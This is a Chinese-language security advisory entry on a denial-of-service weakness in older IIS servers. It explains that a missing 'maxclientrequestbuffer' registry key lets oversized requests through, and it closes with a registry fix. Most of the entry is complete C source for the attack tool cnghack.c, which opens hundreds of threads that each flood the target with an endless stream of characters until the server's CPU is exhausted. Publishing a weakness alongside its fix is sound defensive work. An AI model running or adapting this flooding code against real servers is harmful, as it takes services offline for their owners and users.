17 iis web server dos
漏洞描述:
默认情况下,iis容易被拒绝服务攻击。如果注册表中有一个叫 "maxclientrequestbuffer" 的键未被创建,针对这种nt系
统的攻击通常能奏效。 "maxclientrequestbuffer" 这个键用于设置iis允许接受的输入量。如果 "maxclientrequestbuffer"
设置为256(bytes),则攻击者通过输入大量的字符请求iis将被限制在256字节以内。而系统的缺省设置对此不加限制,因此,利用
下面的程序。可以很容易地对iis server实行dos攻击:
#include <stdio.h>
#include <windows.h>
#define max_thread 666
void cng();
char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main(int argc, char **argv)
{
word tequila;
wsadata data;
int p;
dword tid;
handle hthread[2000];
//this code is as is and sucks as it is. won't exit correctly and a lot
of other fun things.
//that i didn't want to take the time to do. so just ctrl+c out of the
code.
//load up cnghack.exe 3 times for charm.
printf("cng iis dos.\nmarc@eeye.com\nhttp://www.eeye.com\n\"for my
beloved.\"\n");
if(argc<2){
printf("usage: %s [server] [port]\n",argv[0]);
exit(1);
}
buffer=malloc(17500);
memset( buffer, 'a', strlen(buffer));
server=argv[1];
port=atoi(argv[2]);
tequila = makeword( 1, 1 );
printf("attempting to start winsock... ");
if( (wsastartup(tequila, &data)) !=0 ){
printf("failed to start winsock.\n");
exit(1);
}
else{
printf("started winsock.\n\n");
}
counter = 0;
for(p = 0 ; p < max_thread ; ++p ){
hthread[counter] = createthread(0,
0,
(lpthread_start_routine) cng,
( void * )++counter,
0,
&tid);
}
sleep(250);
while( current_threads )
sleep(250);
counter = 0;
printf("terminated threads.\n");
while (counter < max_thread)
{
terminatethread( hthread[counter], 0 );
++counter;
}
wsacleanup();
return 0;
}
void cng()
{
int sockfd=0, p;
struct sockaddr_in dstsain;
char getkilled[]="get / http/\r\n";
int die=1;
printf("entered cng\n");
++current_threads;
dstsain.sin_family = af_inet;
dstsain.sin_port = htons((u_short)port);
dstsain.sin_addr.s_addr=inet_addr( server );
if((sockfd = socket(af_inet, sock_stream, 0)) < 0){
printf("failed to create socket\n");
--current_threads;
return;
}
if(!connect(sockfd,(struct sockaddr *)&dstsain, sizeof(dstsain)))
{
p=send(sockfd,getkilled,strlen(getkilled),0);
printf("step 1: %i\n", p);
for(;;){
p=send(sockfd,buffer,strlen(buffer),0);
printf("p: %i\n", p);
//put in some code to check if send = -1 more then x times we drop
the loop and exit the thread
//bla bla bla i love the dirtiness of concept code.
}
}
--current_threads;
printf("exited cng\n");
return;
}
cnghack.c works by doing the following:
connects to example.com
sends: get / http/[return][buffer]
where:
[return] is just an \r\n
[buffer] is a never ending stream of a's
攻击结果将导致nt系统的cpu占用率达到 100%
解决方案
运行regedt32.exe
在:hkey_local_machine\system\currentcontrolset\services\w3svc\parameters
增加一个值:
value name: maxclientrequestbuffer
data type: reg_dword
设置为十进制
具体数值设置为你想设定的iis允许接受的url最大长度。
cnns的设置为256
<
